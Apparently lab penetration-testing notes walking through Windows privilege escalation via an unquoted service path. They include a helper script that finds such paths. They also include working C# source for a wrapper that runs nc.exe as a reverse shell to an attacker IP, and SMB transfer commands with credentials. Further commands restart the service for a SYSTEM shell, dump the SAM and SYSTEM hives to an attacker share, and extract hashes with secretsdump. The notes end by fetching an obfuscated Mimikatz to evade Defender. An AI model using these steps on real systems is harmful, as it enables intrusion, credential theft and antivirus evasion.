powershell "get-acl -Path 'C:\Windows\Temp\' | format-list"
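The unquoted-path check above run offline, as an added example that is not from the original notes: one function flags service paths from saved wmic output that are unquoted with a space before the .exe, another lists the binaries Windows tries for such a path, which is why a writable directory along that path is the privesc. The sample path list is constructed; the System Explorer path in it is assumed, since the notes do not record it, and the other services are made up.

```shell
#!/bin/sh
# Added example, not part of the original notes.
# Offline check for unquoted service paths over captured `wmic service get
# pathname` output, plus the list of binaries Windows would try for such a
# path. SAMPLE_PATHNAMES is constructed: the System Explorer path is assumed
# (the notes do not record it) and the other services are made up.

SAMPLE_PATHNAMES='"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
C:\Windows\System32\spoolsv.exe
C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
C:\Tools\agent.exe -config "C:\Tools\agent.conf"
C:\Program Files\Foo\bar.exe -k arg with spaces'

# unquoted_service_paths < pathnames -> the paths that are not quoted and
# contain a space before the .exe (spaces only in the arguments are harmless).
unquoted_service_paths() {
    awk '
        /^[[:space:]]*$/ { next }
        /^[[:space:]]*"/ { next }                  # quoted: safe
        {
            exe = tolower($0)
            sub(/\.exe.*/, "", exe)                 # drop arguments after the binary
            if (exe ~ / /) print $0
        }
    '
}

# search_candidates PATH -> the executables CreateProcess tries, in order,
# for an unquoted path: every space-delimited prefix with .exe appended,
# then the full path. A writable directory on this list is the privesc.
search_candidates() {
    rest=$1
    prefix=
    while case "$rest" in *' '*) true ;; *) false ;; esac; do
        prefix="$prefix${prefix:+ }${rest%% *}"
        rest=${rest#* }
        printf '%s.exe\n' "$prefix"
    done
    printf '%s\n' "$prefix${prefix:+ }$rest"
}

# Usage (on Kali, with the wmic output saved from the target):
#   printf '%s\n' "$SAMPLE_PATHNAMES" | unquoted_service_paths
#   search_candidates 'C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe'
```

For each candidate printed, check the ACL of its directory with the get-acl command above; the first candidate whose directory is writable is where the wrapper goes, under the candidate's own file name.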

now we drop an exe into the writable path of the service that launches our nc and connects back to our listener
we name it Wrapper.cs
install mono to compile C# programs on kali -- sudo apt install mono-devel
*********************************
using System;
using System.Diagnostics;

// Launches the previously uploaded nc.exe without a window, connecting back to the attacker.
namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            // nc path, attacker IP and port are hard-coded for this target
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\xampp\\nc-sundeel.exe", "10.50.86.34 4999 -e cmd.exe");
            procInfo.UseShellExecute = false;   // required for CreateNoWindow to take effect
            procInfo.CreateNoWindow = true;
            proc.StartInfo = procInfo;
            proc.Start();
        }
    }
}
*********************************
compile it using mcs Wrapper.cs
Wrapper.exe will be created

Transfer the file using curl again, or use impacket's smbserver
smbserver.py share . -smb2support -username user -password password123 -- . means share the current dir
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -username user -password password123 share .

connect to the share from the victim using net use \\ATTACKER_IP\share /USER:user s3cureP@ssword, e.g.

net use \\10.50.86.34\share /User:user password123

"The command completed successfully." is returned

copy \\10.50.86.34\share\Wrapper.exe %TEMP%\wrapper-sundeel.exe

copy \\10.50.86.34\share\Wrapper.exe C:\xampp\wrapper-sunny.exe

run it once to see that it works (we should get a shell on our listener)

net use \\ATTACKER_IP\share /del -- to disconnect

now put the file in the System Explorer directory and name it System.exe

then stop the service with sc stop <service name>

and start it again with
sc start <service name>
while our nc listener is running
and we get a shell as the service account, SYSTEM

since Defender is on this PC, mimikatz would get caught, so we copy the SAM and SYSTEM registry hives and extract the hashes offline
reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak
we then transfer them to our system over the smbserver.py share
move sam.bak \\ATTACKING_IP\share\sam.bak
move system.bak \\ATTACKING_IP\share\system.bak

dump the hashes with secretsdump.py (LOCAL tells it to parse the hive files rather than connect to a host)

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam PATH/TO/SAM_FILE -system PATH/TO/SYSTEM_FILE LOCAL

OR GET AN OBFUSCATED MIMIKATZ FROM

https://raw.githubusercontent.com/HernanRodriguez1/MimikatzFUD/main/Invoke-M1m1fud2.ps1
copy \\10.50.86.34\share\Invoke-M1m1fud2.ps1 C:\xampp\Invoke-M1m1fud2.ps1